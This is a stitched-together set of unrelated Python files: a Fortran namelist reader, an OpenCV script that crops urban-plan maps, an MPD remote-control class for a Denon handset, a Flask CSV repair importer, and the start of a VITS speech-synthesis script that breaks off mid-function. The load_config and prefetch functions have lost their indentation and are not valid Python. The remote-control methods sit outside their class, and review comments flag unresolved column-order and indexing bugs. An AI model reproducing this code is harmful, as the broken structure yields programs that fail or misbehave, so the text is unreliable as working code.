        try:
            namelist = f90nml_read_file(temp_path)
        finally:
            # Remove the temporary file even if parsing raises; previously a
            # parse failure leaked the temp file on disk.
            temp_path.unlink()
    else:
        namelist = f90nml_read_file(path)

    return convert_dict_to_defaultdict_recursive(namelist)
def f90nml_read_file(filename: Path):
    """
    Uses the f90nml library to read the namelist at *filename* and return
    its contents as a plain dict.

    (Conversion to defaultdicts is done separately by
    convert_dict_to_defaultdict_recursive; the previous docstring wrongly
    claimed a defaultdict was returned here.)
    """
    namelist = f90nml.read(str(filename)).todict()
    return namelist
def convert_dict_to_defaultdict_recursive(input_dict):
    """
    Recursively wrap *input_dict* — and every nested dict value — in a
    defaultdict whose missing keys default to an empty list.
    """
    return defaultdict(
        list,
        {
            key: convert_dict_to_defaultdict_recursive(value)
            if isinstance(value, dict)
            else value
            for key, value in input_dict.items()
        },
    )
def convert_params_filepaths(parameter_file_path: Path, params: dict):
    """
    Adds parameters in linked namelists to the base parameter dictionary.

    parameter_file_path: path to the main parameter file; linked namelist
    paths are resolved relative to its parent directory.
    params: base parameter dict, updated in place and returned.
    """
    # Maps a *_path key of the main file to the namelist group expected
    # inside the linked file.
    params_paths = {
        "grid_params_path": "params_grid",
        "map_params_path": "params_map",
        "init_params_path": "params_init",
        "trace_params_path": "params_trace",
        "tstep_params_path": "params_tstep",
        "physmod_params_path": "params_physmod",
        "bndconds_params_path": "params_bndconds",
        "bufferz_params_path": "params_bufferz",
        "floors_params_path": "params_floors",
        "multigrid_params_path": "params_multigrid",
        "pimsolver_params_path": "params_pimsolver",
        "penalisation_params_path": "params_penalisation",
        "diags_params_path": "params_diags",
        "srcsnk_params_path": "params_srcsnk",
        "tempdev_params_path": "params_tempdev",
        "neutrals_params_path": "params_neutrals",
        "iotrunk_params_path": "params_iotrunk",
    }

    for key, path in params["params_filepaths"].items():
        pointer_filepath = parameter_file_path.parent / path
        assert pointer_filepath.exists()
        pointer_params = read_fortran_namelist(pointer_filepath)

        if key == "equi_init_params_path":
            # The equilibrium group name varies (equi_*_params); locate it.
            equi_params = fnmatch.filter(pointer_params.keys(), "equi_*_params")
            assert len(equi_params) == 1
            params[equi_params[0]] = pointer_params[equi_params[0]]
        else:
            new_key = params_paths[key]
            # Idiom fix: was `if not new_key in pointer_params.keys()`.
            if new_key not in pointer_params:
                print(f"No match for {new_key}. Setting to []")
            else:
                params[new_key] = pointer_params[new_key]

    return params
|
import cv2
import numpy as np
import imutils
# Scale factor for crops. Must be an integer >= 1: it is used in slice
# bounds below. BUG FIX: the original computed `512/c`, which is a float in
# Python 3 and raises TypeError when used as a slice index; use 512 // c.
c = 1
folder = "input4/"
win = 512 // c  # side length of the source window before rescaling

# Master-plan areas ("Yleiskaava"): inverted binary mask of the regions.
alueet = cv2.imread(folder + 'Yleiskaava.png', 0)
alueet = cv2.threshold(alueet, 127, 255, cv2.THRESH_BINARY_INV)[1]  # ensure binary
connectivity = 8
output = cv2.connectedComponentsWithStats(alueet, connectivity, cv2.CV_32S)
kernel = np.ones((5, 5), np.uint8)

# City blocks ("Korttelit"), target street network ("Tavoiteverkko"),
# detailed street areas ("Katualueet"), density ("Tehokkuus").
korttelit = cv2.imread(folder + 'Korttelit.png', 0)
korttelit = cv2.threshold(korttelit, 127, 255, cv2.THRESH_BINARY_INV)[1]  # ensure binary
kadut = cv2.imread(folder + 'Tavoiteverkko.png', 0)
kadut_mask = cv2.threshold(kadut, 127, 255, cv2.THRESH_BINARY_INV)[1]
detailed_kadut = cv2.imread(folder + 'Katualueet.png', 0)
detailed_kadut = cv2.threshold(detailed_kadut, 127, 255, cv2.THRESH_BINARY_INV)[1]
tehokkuus = cv2.imread(folder + 'Tehokkuus.png', 0)

ret = output[0]      # number of connected-component labels
labels = output[1]   # label matrix
stats = output[2]    # per-label bounding-box / area stats

identifier = 0
for label in range(1, ret):
    x = stats[label, cv2.CC_STAT_LEFT]
    y = stats[label, cv2.CC_STAT_TOP]
    w = stats[label, cv2.CC_STAT_WIDTH]
    h = stats[label, cv2.CC_STAT_HEIGHT]
    # Skip tiny components (noise).
    if w < 10 or h < 10:
        continue

    # Binary mask of this component only, cropped to its bounding box.
    mask = np.zeros(alueet.shape, dtype=np.uint8)
    mask[labels == label] = 255
    crop = mask[y:y + h, x:x + w]
    crop = cv2.resize(crop, (0, 0), fx=c, fy=c)
    newH, newW = crop.shape
    if newH > 512 or newW > 512:
        continue

    # Output canvas is a 512x1024 RGB pair: left half = masks/streets,
    # right half = the block slice.
    green = np.zeros((512, 1024), dtype=np.uint8)
    blue = np.zeros((512, 1024), dtype=np.uint8)
    red = np.zeros((512, 1024), dtype=np.uint8)

    # Centre the crop in the left 512x512 half.
    offsetX = (512 - newW) // 2
    offsetY = (512 - newH) // 2
    green[offsetY:offsetY + newH, offsetX:offsetX + newW] = crop

    # Top-left corner of the (centred) window in source coordinates.
    yos = y - offsetY
    xos = x - offsetX

    korttelit_slice = korttelit[yos:yos + win, xos:xos + win]
    korttelit_slice = cv2.resize(korttelit_slice, (0, 0), fx=c, fy=c)
    kH, kW = korttelit_slice.shape
    korttelit_slice = cv2.bitwise_and(korttelit_slice, korttelit_slice, mask=green[0:kH, 0:kW])

    korttelit_mask_slice = korttelit[yos:yos + win, xos:xos + win]
    korttelit_mask_slice = cv2.resize(korttelit_mask_slice, (0, 0), fx=c, fy=c)
    korttelit_mask_slice = cv2.bitwise_and(korttelit_mask_slice, korttelit_mask_slice, mask=green[0:kH, 0:kW])
    korttelit_mask_slice = cv2.dilate(korttelit_mask_slice, kernel, iterations=5)
    komsH, komsW = korttelit_mask_slice.shape
    if komsW != 512 or komsH != 512:
        continue

    korttelit_mask_slice_2x = np.zeros((512, 1024), dtype=np.uint8)
    korttelit_mask_slice_2x[0:512, 0:512] = korttelit_mask_slice

    # Mask the component by the dilated block mask, and mirror the block
    # slice into the right half of all three channels (RGB output).
    green = cv2.bitwise_and(green, green, mask=korttelit_mask_slice_2x)
    green[0:kH, 512:(512 + kW)] = korttelit_slice
    red[0:kH, 512:(512 + kW)] = korttelit_slice
    blue[0:kH, 512:(512 + kW)] = korttelit_slice

    kadut_mask_slice = kadut_mask[yos:yos + win, xos:xos + win]
    kadut_mask_slice = cv2.resize(kadut_mask_slice, (0, 0), fx=c, fy=c)
    kmsH, kmsW = kadut_mask_slice.shape
    if kmsW != 512 or kmsH != 512:
        continue

    kadut_slice = kadut[yos:yos + win, xos:xos + win]
    kadut_slice = cv2.resize(kadut_slice, (0, 0), fx=c, fy=c)
    ksH, ksW = kadut_slice.shape

    detailed_kadut_slice = detailed_kadut[yos:yos + win, xos:xos + win]
    detailed_kadut_slice = cv2.resize(detailed_kadut_slice, (0, 0), fx=c, fy=c)
    # Keep only the detailed streets outside this component's area.
    detailed_kadut_slice_masked = cv2.bitwise_and(
        detailed_kadut_slice, detailed_kadut_slice, mask=(255 - green[0:512, 0:512]))

    blue[0:512, 0:512] = detailed_kadut_slice_masked
    red[0:512, 0:512] = kadut_mask_slice

    # Skip windows with no block pixels at all.
    white = np.sum(korttelit_slice == 255)
    if white < 1:
        continue

    out = cv2.merge((blue, green, red))
    cv2.imwrite("out/" + str(identifier) + ".png", out)
    print(identifier)
    cv2.imwrite("out/" + str(identifier) + "_dk.png", detailed_kadut[yos:yos + win, xos:xos + win])
    cv2.imwrite("out/" + str(identifier) + "_dks.png", detailed_kadut_slice)
    cv2.imwrite("out/" + str(identifier) + "_dksm.png", detailed_kadut_slice_masked)
    identifier += 1
from typing import Callable, Optional, List, Set
import logging
import subprocess
from pathlib import Path
from readchar import key
import appdirs
import yaml
from . import Remote, MuteContext, vanity
from .backend import Client
from .library import Album
from .speech import Speech, Beep, conjoin
class DenonRC1223(Remote):
    def __init__(self, client: Client):
        """Remote-control mapping for the Denon RC-1223 handset.

        Wires every handset key to a handler and defines the genre groups
        reachable from the number pad.
        """
        super().__init__(client)
        # Feedback tone (e.g. played during volume changes while idle).
        self._beep = Beep(hz=300, duration=0.2)
        # Character the handset emits for a repeated key press.
        self._repeat_char = "+"
        # Seconds to wait before flushing buffered key input.
        self._flush_seconds = 0.25
        # Seconds jumped by one rewind / fast-forward press.
        self._seek_seconds = 30
        # Number-pad digit -> list of library genres it selects.
        self._genres = {
            "1": [
                "Classical",
            ],
            "2": [
                "Acoustic",
                "Soft Rock",
                "R&B",
            ],
            "3": [
                "Folk",
                "Indie Folk",
                "Indie",
                "Indie Rock",
                "Indie Pop",
                "Worldbeat",
                "Blues",
                "Celtic",
            ],
            "4": [
                "Hip-Hop",
                "Rap",
                "Reggae",
            ],
            "5": [
                "Jazz",
                "Jazz Pop",
                "Instrumental",
            ],
            "6": [
                "Hard Rock",
                "Punk Rock",
                "Nu Metal",
                "Ska",
                "Grunge",
                "Metal",
                "Alternative Metal",
            ],
            "7": [
                "Alternative Rock",
                "Blues Rock",
                "Classic Rock",
                "Folk Rock",
                "Progressive Rock",
                "Indie Rock",
                "Post Grunge",
                "Country",
                "Country Rock",
                "Latin",
                "Pop Rock",
            ],
            "8": [
                "Electronic",
                "Dance",
                "Disco",
                "House",
            ],
            "9": [
                "Religious",
                "Gospel",
                "Soul",
            ],
            "0": [
                "Pop",
                "Pop Punk",
                "Funk",
            ],
        }
        # Index into vanity.MODES; see _search_mode().
        self._vanity_idx = 0
        # Key character -> bound handler. NOTE: each handler's docstring is
        # spoken aloud as its help text (see enter() and prefetch()).
        self._actions = {
            #
            # System controls:
            "~": self.power,
            #
            # Amp controls:
            "=": self.volume,
            "-": self.volume,
            #
            # Playback controls:
            " ": self.toggle_playback,
            "<": self.prev,
            ">": self.next,
            "/": self.stop,
            ",": self.seek_rewind,
            ".": self.seek_forward,
            #
            # Direction pad:
            "\r": self.enter,
            "\n": self.enter,
            "b": self.back,
            key.UP: self.up,
            key.LEFT: self.left,
            key.DOWN: self.down,
            key.RIGHT: self.right,
            #
            # Center remote:
            "i": self.info,
            "s": self.source,
            "q": self.queue,
            "m": self.mode,
            "t": self.setup,
            #
            # Number pad:
            "1": self.number("1"),
            "2": self.number("2"),
            "3": self.number("3"),
            "4": self.number("4"),
            "5": self.number("5"),
            "6": self.number("6"),
            "7": self.number("7"),
            "8": self.number("8"),
            "9": self.number("9"),
            "0": self.number("0"),
            "+": self.number_plus,
            #
            # Lower row:
            "l": self.clear,
            "r": self.random,
            "p": self.repeat,
            "d": self.dimmer,
        }
def load_config(self):
filepath = Path(appdirs.user_config_dir("mpd-remote")) / "denon_rc1223.yaml"
if filepath.is_file():
logging.info(f"Loading configuration file: {filepath}")
with filepath.open("r") as file:
config = yaml.safe_load(file)
if "genres" in config:
self._genres = config["genres"]
if "flush_seconds" in config:
self._flush_seconds = config["flush_seconds"]
    def _button(self, name: str):
        # Trace every physical button press for debugging.
        logging.info(f"Button: {name}")
    def _search_mode(self) -> str:
        # Currently selected vanity-search mode, chosen by self._vanity_idx.
        return vanity.MODES[self._vanity_idx]
    def print_genre_groups(self):
        """Print the genre mapping along with how many albums are in each genre."""
        all_genres: List[str] = self._client.genres()
        seen_genres: Set[str] = set()
        # Column width: the longest genre name in the library.
        padding = max([len(x) for x in all_genres])

        def analyze_genres(genres):
            # Print per-genre album counts plus a de-duplicated total, and
            # record each genre in seen_genres so unmapped ones can be
            # listed afterwards.
            total: Set[str] = set()
            for gnr in genres:
                albums = self._client.library.albums_with_genres([gnr])
                num = len(albums)
                print(" + {:<{}} {}".format(gnr, padding, num))
                seen_genres.add(gnr)
                for alb in albums:
                    total.add(alb)
            print(" --{:->{}} {}".format(">", padding, len(total)))

        for gid, genres in self._genres.items():
            print(f"Number {gid}:")
            analyze_genres(genres)
        # Genres present in the library but not mapped to any number key.
        unmapped = [g for g in all_genres if g not in seen_genres]
        print("Unmapped:")
        analyze_genres(unmapped)
        self.flush_stdout()
def prefetch(self):
"""Prefetch audio speech segments for reduced waiting times (roughly 30
MB for a large library)."""
# Prefetch common terms (these will change from time to time):
logging.info("Prefetching: common terms")
for text in [
"OK",
"Back.",
"Ready.",
"Not implemented yet.",
"Use directional buttons.",
"Sorry, an error occurred.",
#
# Help: enter()
"Press a button for help.",
"Sorry, this button is undocumented.",
"Sorry, this input event is unmapped.",
#
# Power menu: power()
"Power menu.",
"Update library?",
"Updating library.",
"Restart system?",
"Restarting system.",
"Shutdown system?",
"Shutting down system.",
#
# Setup menu: setup()
"Setup menu.",
"consume: on",
"consume: off",
"random: on",
"random: off",
"repeat: on",
"repeat: off",
"single: on",
"single: off",
"single: one shot",
"replay-gain: off",
"replay-gain: auto",
"replay-gain: track",
"replay-gain: album",
#
# Information: info(), source(), queue()
"Currently playing:",
"Current playlist is empty.",
"Current playlist has:",
#
# Searching: down()
"Search albums.",
"Searching with:",
"search mode: strict",
"search mode: linear",
"search mode: fuzzy",
"Use vanity numbers to search.",
"Use numbers and directional buttons.",
]:
Speech(text).prefetch()
# Prefetch help texts:
logging.info("Prefetching: help texts")
for key in self._actions.keys():
action = self._actions[key]
if action.__doc__:
Speech(action.__doc__).prefetch()
# Prefetch numbers up to 100:
logging.info("Prefetching: numbers")
for num in range(100):
Speech(f"{num}").prefetch()
# Prefetch all album paths:
logging.info("Prefetching: album paths")
for alb in self._client.library.albums.keys():
Speech(alb).prefetch()
def power(self):
    """Update, restart or shutdown system."""
    self._button("POWER")

    def power_update(ctx):
        # Trigger a library rescan on the player and confirm when finished.
        ctx.say("Updating library.")
        self._client.update()
        ctx.say("Done.")

    def power_restart(ctx):
        # NOTE: requires sufficient privileges to run reboot.
        ctx.say("Restarting system.")
        subprocess.run(["reboot"])

    def power_shutdown(ctx):
        # NOTE: requires sufficient privileges to run poweroff.
        ctx.say("Shutting down system.")
        subprocess.run(["poweroff"])

    # Present the three entries as a spoken menu; the chosen callback
    # receives the mute context.
    with self.mute_context() as ctx:
        self.navigate_menu(
            ctx,
            [
                ("Update library?", power_update),
                ("Restart system?", power_restart),
                ("Shutdown system?", power_shutdown),
            ],
            title="Power menu.",
        )
def volume(self):
    """Beep during volume changes."""
    # While music is playing the music itself gives audible feedback,
    # so the beep is only needed when playback is idle.
    if self._client.is_playing():
        return
    self._beep.play()
def toggle_playback(self):
    """Toggle playback."""
    self._button("PLAY/PAUSE")  # acknowledge the key press first
    self._client.toggle_playback()
def play(self):
    """Start playback."""
    self._button("PLAY")  # acknowledge the key press first
    self._client.play()
def pause(self):
    """Pause playback."""
    self._button("PAUSE")  # acknowledge the key press first
    self._client.pause()
def prev(self):
    """Previous track."""
    self._button("PREV")  # acknowledge the key press first
    self._client.prev()
def next(self):
    """Next track."""
    self._button("NEXT")  # acknowledge the key press first
    self._client.next()
def stop(self):
    """Stop playback."""
    self._button("STOP")  # acknowledge the key press first
    self._client.stop()
def seek_rewind(self):
    """Rewind track."""
    self._button("REWIND")
    # Seek backwards by the configured step size.
    self._client.seek_rewind(self._seek_seconds)
def seek_forward(self):
    """Fast-forward track."""
    self._button("FORWARD")
    # Seek forwards by the configured step size.
    self._client.seek_forward(self._seek_seconds)
def enter(self):
    """Help. In menus: selecting entries."""
    self._button("ENTER")
    # Outside of a menu, ENTER opens the interactive help menu.
    with self.mute_context() as ctx:
        self.help_menu(ctx)
def back(self):
    """Nothing. In menus: go back."""
    self._button("BACK")
    status, _ = self._client.status()
    # Speak a short confirmation, but only when playback is not running --
    # during playback the announcement would talk over the music.
    # (Simplified from the original empty `if ==: pass / else:` branch.)
    if status["state"] != "play":
        with self.mute_context() as ctx:
            ctx.say("Ready.")
def up(self):
    """Search playlists by name. In menus: previous entry."""
    self._button("UP")
    # Placeholder: playlist search is not implemented yet.
    # (Removed a dead trailing `pass` statement.)
    with self.mute_context() as ctx:
        ctx.say("Not implemented yet.")
def left(self):
    """Nothing. In menus: go back."""
    # Only logs the press; LEFT has no standalone function.
    self._button("LEFT")
def right(self):
    """Nothing. In menus: select or toggle."""
    # Only logs the press; RIGHT has no standalone function.
    self._button("RIGHT")
def down(self):
    """Search albums by path. In menus: next entry.

    Runs an interactive loop: digits extend a vanity (phone-keypad)
    query, UP/DOWN step through results, "i" reads the query back,
    "m" cycles the search mode, ENTER plays the selected album.
    """
    self._button("DOWN")
    # Album chosen with ENTER; played after the loop exits.
    play: Optional[Album] = None

    def toggle_vanity(ctx: MuteContext):
        # Cycle to the next vanity search mode and announce it.
        self._vanity_idx = (self._vanity_idx + 1) % len(vanity.MODES)
        return ctx.say_async(f"search mode: {self._search_mode()}")

    def extend_results(ctx):
        # Pull one more result from the lazy search generator, if any.
        if ctx.generator is None:
            return
        try:
            item = next(ctx.generator)
        except StopIteration:
            pass
        else:
            ctx.results.append(item)
            ctx.index += 1

    def say_current(ctx, say_initial: bool = False):
        # Announce the 1-based result number, then speak the album path.
        if ctx.index >= 0:
            if ctx.index > 0 or say_initial:
                ctx.player = ctx.say_async(f"{ctx.index+1}")
            result = Speech(str(ctx.results[ctx.index].path)).prefetch()
            ctx.player.wait()
            return result.play_async()
        # No results: just say "0".
        return ctx.say_async("0")

    def new_search(ctx, query: str):
        # Restart the search with the (updated) query and speak the first hit.
        ctx.results = []
        logging.info(f"Searching vanity: {query}")
        ctx.generator = ctx.api.library.search_vanity(
            query, mode=self._search_mode()
        )
        ctx.index = -1
        extend_results(ctx)
        if ctx.player:
            ctx.player.wait()
        return say_current(ctx)

    with self.mute_context() as ctx:
        # Set up context:
        ctx.generator = None
        ctx.results: List[Album] = []
        ctx.index: int = -1
        ctx.player: subprocess.Popen = ctx.say_async("Search albums.")
        # Build query and update results:
        query: str = ""
        while True:
            self.flush_stdin(self._flush_seconds)
            char = self.prompt_stdin()
            # Stop any speech still playing before reacting to the key.
            logging.info(f"Kill process: {ctx.player.pid}")
            ctx.player.terminate()
            ctx.player.wait()
            if char in self.BACK_KEYS:
                ctx.say("Back.")
                break
            elif (char >= "0" and char <= "9") or char in ["l", "m", key.LEFT]:
                # Query editing: "l"/LEFT = backspace, "m" = cycle mode,
                # digits extend the vanity query; all three re-run the search.
                if char in ["l", key.LEFT]:
                    query = query[:-1]
                elif char == "m":
                    ctx.player = toggle_vanity(ctx)
                else:
                    query += char
                ctx.player = new_search(ctx, query)
            elif char == "i":
                # Read the current query back to the user.
                if query != "":
                    ctx.player = ctx.say_async("Searching with:")
                    target = Speech(f"{query}").prefetch(cache=False)
                    ctx.player.wait()
                    target.play()
                else:
                    ctx.player = ctx.say_async("Use vanity numbers to search.")
            elif char == key.DOWN:
                # Next result; fetch lazily from the generator when needed.
                if ctx.index + 1 >= len(ctx.results):
                    extend_results(ctx)
                else:
                    ctx.index += 1
                ctx.player = say_current(ctx)
            elif char == key.UP:
                # Previous result (stops at the first).
                if ctx.index > 0:
                    ctx.index -= 1
                ctx.player = say_current(ctx, say_initial=True)
            elif char in self.ENTER_KEYS:
                # NOTE(review): with no results ctx.index is -1, so this
                # indexes results[-1] / raises IndexError -- confirm intended.
                play = ctx.results[ctx.index]
                ctx.say("OK")
                break
            else:
                ctx.player = ctx.say_async("Use numbers and directional buttons.")
    if play is not None:
        logging.info(f"Playing album: {play.path}")
        self._client.play_album(play)
def info(self):
    """Speak title and artist of current track."""
    self._button("INFO")
    with self.mute_context() as ctx:
        if ctx.status["playlistlength"] == "0":
            ctx.say("Current playlist is empty.")
            return
        announcement = ctx.say_async("Currently playing:")
        track = ctx.current()
        assert track is not None
        # Synthesize the details while the announcement is still speaking;
        # titles are per-track, so skip the on-disk cache.
        details = Speech(f"{track.title} by {track.artist}").prefetch(cache=False)
        announcement.wait()
        details.play()
def source(self):
    """Speak album and artist of current track."""
    self._button("SOURCE")
    with self.mute_context() as ctx:
        if ctx.status["playlistlength"] == "0":
            ctx.say("Current playlist is empty.")
            return
        announcement = ctx.say_async("Currently playing:")
        track = ctx.current()
        assert track is not None
        # Album names recur, so the default (cached) prefetch is used here.
        details = Speech(f"{track.album} by {track.albumartist}").prefetch()
        announcement.wait()
        details.play()
def queue(self):
    """Speak queue length and duration."""
    self._button("QUEUE")
    with self.mute_context() as ctx:
        if ctx.status["playlistlength"] == "0":
            ctx.say("Current playlist is empty.")
            return
        announcement = ctx.say_async("Current playlist has:")
        track_count = ctx.status["playlistlength"]
        # Total playlist duration, rounded to whole minutes.
        total_minutes = round(sum(t.duration for t in ctx.playlist) / 60)
        summary = Speech(
            f"{track_count} tracks summing {total_minutes} minutes."
        ).prefetch(cache=False)
        announcement.wait()
        summary.play()
def mode(self):
    """Reserved."""
    self._button("MODE")
    # Placeholder until the MODE button gets a function.
    # (Removed a dead trailing `pass` statement.)
    with self.mute_context() as ctx:
        ctx.say("Not implemented yet.")
def setup(self):
    """Modify playback settings.

    Builds a spoken menu whose entries are (label-callback, toggle-callback)
    pairs for MPD-style playback options.
    """
    self._button("SETUP")

    def option(key: str):
        # "single" has a third "oneshot" state; the others are plain on/off.
        if key == "single":
            info = {"0": "off", "1": "on", "oneshot": "one shot"}
            toggle = {"0": "1", "1": "oneshot", "oneshot": "0"}
        else:
            info = {"0": "off", "1": "on"}
            toggle = {"0": "1", "1": "0"}
        # First lambda renders the current state for speech; second cycles it.
        # `or True` makes the toggle report success regardless of the API's
        # return value (which is discarded).
        return (
            lambda ctx: f"{key}: {info[ctx.status[key]]}",
            lambda ctx: ctx.api.toggle(key, toggle[ctx.status[key]]) or True,
        )

    def option_replay_gain():
        # Replay gain has its own status/toggle API calls.
        return (
            lambda ctx: f"replay-gain: {ctx.api.status_replay_gain()}",
            lambda ctx: ctx.api.toggle_replay_gain() or True,
        )

    with self.mute_context() as ctx:
        self.navigate_menu(
            ctx,
            [
                option("consume"),
                option("random"),
                option("repeat"),
                option("single"),
                option_replay_gain(),
            ],
            title="Setup menu.",
        )
def number(self, num: str) -> Callable[[], None]:
    """Create a function to play a random album from a list of genres.

    :param num: the digit key ("0"-"9") this action is bound to; its genre
        list comes from self._genres.
    :return: a zero-argument action suitable for the dispatch table.
    """
    genres = self._genres[num]
    # Button label includes the vanity letters printed on the key.
    button = f"{num} {vanity.VANITY_MAP[num]}"

    def func():
        self._button(button)
        # Remember this key so the REPEAT button can replay the choice.
        self._repeat_char = self._input_char
        self._client.play_random(genres)

    # Set the documentation on the function so that the help function works.
    func.__doc__ = f"Play {conjoin('or', genres or ['random'])} album."
    return func
def number_plus(self):
    """Play recent album."""
    self._button("+10 a/A")
    self._client.play_recent()
    # Remember this key so the REPEAT button can replay the choice.
    self._repeat_char = self._input_char
def clear(self):
    """Clear playlist."""
    self._button("CLEAR")
    self._client.clear()
def random(self):
    """Play random album."""
    self._button("RANDOM")
    # Key "0" is bound to the unfiltered random-album action.
    self._actions["0"]()
def repeat(self):
    """Repeat last number choice."""
    self._button("REPEAT")
    # Re-invoke the action bound to the most recently used number key.
    self._actions[self._repeat_char]()
def dimmer(self):
    """Reserved."""
    self._button("DIMMER")
    # Placeholder until the DIMMER button gets a function.
    # (Removed a dead trailing `pass` statement.)
    with self.mute_context() as ctx:
        ctx.say("Not implemented yet.")
|
import csv
import decimal
import logging
import typing
from io import StringIO
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import FlushError
from flask import flash
from project.server import db
from project.server.models import Manufacturer, DeviceSeries, Device, Color, Repair
logger = logging.getLogger(__name__)
def import_repairs(repair_file_content: str) -> typing.Tuple[int, str]:
    """Import repairs from CSV file content.

    Expected header: Hersteller,Serie,Geraet,Farbe,Reparatur,Preis (6 columns).
    Manufacturers, series and devices are created on the fly when missing.

    :param repair_file_content: the raw CSV text.
    :return: (number of imported repairs, error message). On validation
        failure the count is 0 and the message describes the problem.
    """
    string = StringIO(repair_file_content)
    csv_reader = csv.reader(string, delimiter=',')
    headers = next(csv_reader)
    if len(headers) != 6:
        # Return 0 instead of False to honour the declared Tuple[int, str]
        # contract (False == 0, so truthiness-based callers are unaffected).
        return 0, "Es werden genau 6 Spalten benötigt. Herstelle,Serie,Gerät,Farbe,Reparatur,Preis (in €)"
    counter = 0
    # NOTE(review): the header text lists Farbe before Reparatur, but the
    # unpacking below reads the 4th column as the repair name and the 5th as
    # the color -- confirm the actual column order of the input files.
    for manufacturer, series, device, repair, color_string, price_str in csv_reader:
        try:
            manufacturer = manufacturer_create_or_get(manufacturer)
            series = series_create_or_get(manufacturer, series)
            device = device_create_or_get(series, device)
            colors = get_colors(color_string)
            price = str_to_dec(price_str)
            if not colors and color_string:
                return 0, f"Farbe {color_string} existiert nicht im System. Bitte wähle eine existierende! Achte darauf, dass der *internal_name* als Name erwartet wird."
            if price is None:
                return 0, f"Der Preis '{price_str}' scheint kein valider Preis zu sein."
            repair = create_new_or_skip_existing(repair, device, price)
            # NOTE(review): this overwrites the device's color list on every
            # row of the same device -- confirm that is intended.
            repair.device.colors = colors
            repair.save()
            if repair:
                counter += 1
        except (IntegrityError, FlushError,) as e:
            # Roll back the failed row and continue with the next one.
            # (Dropped the duplicate print(e); logger.error already records it.)
            logger.error(e)
            db.session.rollback()
            continue
    if counter == 0:
        return 0, "Keine neuen Reparturen gefunden"
    return counter, ""
def str_to_dec(price: str) -> typing.Optional[decimal.Decimal]:
    """Parse a price string (possibly quoted or padded) into a Decimal.

    :param price: e.g. ``'12.50'`` or ``' "3.99" '``.
    :return: the parsed Decimal, or None when the string is not a valid price.
    """
    try:
        return decimal.Decimal(price.strip(' "'))
    except (decimal.InvalidOperation, ValueError, TypeError, AttributeError):
        # Narrowed from `except Exception`: only parsing-related failures
        # mean "not a price"; anything else should surface.
        return None
def create_new_or_skip_existing(rep_name: str, device: Device, price: decimal.Decimal) -> typing.Optional[Repair]:
    """Create a repair for *device*, or return the existing one.

    When a repair with this name already exists and the price differs, the
    price is updated (the caller persists via save()).

    :param rep_name: name of the repair.
    :param device: device the repair belongs to.
    :param price: price to create with / update to.
    :return: the created or existing Repair.
    """
    repairs: typing.List[Repair] = [rep for rep in device.repairs if rep.name == rep_name]
    if not repairs:
        return Repair.create(name=rep_name, device=device, price=price)
    # Repair does already exist:
    rep = repairs[0]
    if rep.price != price:
        flash(f"Updating {rep}: Setting price from {rep.price} to {price}")
        # Bug fix: actually apply the new price -- previously only the flash
        # message claimed an update while rep.price was left unchanged.
        rep.price = price
    else:
        logger.info(f"Skipping {rep} because it exists.")
    return rep
def manufacturer_create_or_get(manufacturer: str) -> Manufacturer:
    """Return the Manufacturer with this name, creating it (activated) if absent."""
    found = Manufacturer.query.filter(Manufacturer.name == manufacturer).first()
    if found:
        return found
    return Manufacturer.create(name=manufacturer, activated=True)
def series_create_or_get(manufacturer: Manufacturer, series_name: str) -> DeviceSeries:
    """Return the series with this name under *manufacturer*, creating it if missing.

    :param manufacturer: owning manufacturer.
    :param series_name: name of the series.
    """
    # Scope the lookup to the manufacturer: two manufacturers may both have a
    # series of the same name, and matching by name alone would reuse (and
    # cross-link) the wrong row.
    series = DeviceSeries.query.filter(
        DeviceSeries.name == series_name,
        DeviceSeries.manufacturer == manufacturer,
    ).first()
    if not series:
        series = DeviceSeries.create(manufacturer=manufacturer, name=series_name)
    return series
def device_create_or_get(series: DeviceSeries, device_name: str) -> Device:
    """Return the device with this name inside *series*, creating it if missing.

    :param series: owning device series.
    :param device_name: name of the device.
    """
    # Scope the lookup to the series: identically named devices may exist in
    # different series, and matching by name alone would reuse the wrong row.
    device = Device.query.filter(
        Device.name == device_name,
        Device.series == series,
    ).first()
    if not device:
        device = Device.create(series=series, name=device_name)
    return device
def get_colors(color: str) -> typing.List[Color]:
    """Resolve a comma-separated list of color internal names to Color rows.

    :param color: e.g. ``"black, white"``; names are stripped of whitespace.
    :return: all matching Color rows (may be empty).
    """
    # Renamed the loop variable: the original generator shadowed the `color`
    # parameter, which worked but obscured which value was being used.
    names = [part.strip() for part in color.split(",")]
    return Color.query.filter(Color.name.in_(names)).all()
|
#!/usr/bin/env python3
import argparse
import logging
import os
import re
import sys
import time
from pathlib import Path
import torch
from vits_train.checkpoint import load_checkpoint
from vits_train.config import TrainingConfig
from vits_train.utils import audio_float_to_int16
from vits_train.wavfile import write as write_wav
_LOGGER = logging.getLogger("vits_train.infer")
def main():
    """Main entry point.

    Reads phoneme ids (or raw text with --text) from stdin, runs VITS
    inference per line, and writes one WAV file per utterance.
    """
    parser = argparse.ArgumentParser(prog="vits-train.infer")
    parser.add_argument("--model-dir", help="Path to model directory")
    parser.add_argument(
        "--checkpoint", help="Path to model checkpoint (default: best_model.pth)"
    )
    parser.add_argument(
        "--output-dir",
        help="Directory to write WAV file(s) (default: current directory)",
    )
    parser.add_argument(
        "--text", action="store_true", help="Input is text instead of phoneme ids"
    )
    parser.add_argument(
        "--csv", action="store_true", help="Input format is id|p1 p2 p3..."
    )
    parser.add_argument("--noise-scale", type=float, default=0.667)
    parser.add_argument("--noise-scale-w", type=float, default=0.8)
    parser.add_argument("--length-scale", type=float, default=1.0)
    parser.add_argument("--cuda", action="store_true", help="Use GPU for inference")
    parser.add_argument(
        "--speaker", type=int, help="Speaker id number (multispeaker model only)"
    )
    parser.add_argument(
        "--debug", action="store_true", help="Print DEBUG messages to the console"
    )
    args = parser.parse_args()

    if args.debug:
        logging.basicConfig(level=logging.DEBUG)
    else:
        logging.basicConfig(level=logging.INFO)

    _LOGGER.debug(args)

    # -------------------------------------------------------------------------

    # Convert to paths
    if args.model_dir:
        args.model_dir = Path(args.model_dir)
    else:
        args.model_dir = Path.cwd()

    if args.output_dir:
        args.output_dir = Path(args.output_dir)
        args.output_dir.mkdir(parents=True, exist_ok=True)
    else:
        args.output_dir = Path.cwd()

    # Load config
    config_path = args.model_dir / "config.json"
    _LOGGER.debug("Loading configuration(s) from %s", config_path)
    with open(config_path, "r", encoding="utf-8") as config_file:
        config = TrainingConfig.load(config_file)

    _LOGGER.debug(config)

    phoneme_to_id = {}
    if args.text:
        # Load phonemes (one "<id> <phoneme>" pair per non-comment line).
        num_phonemes = 0
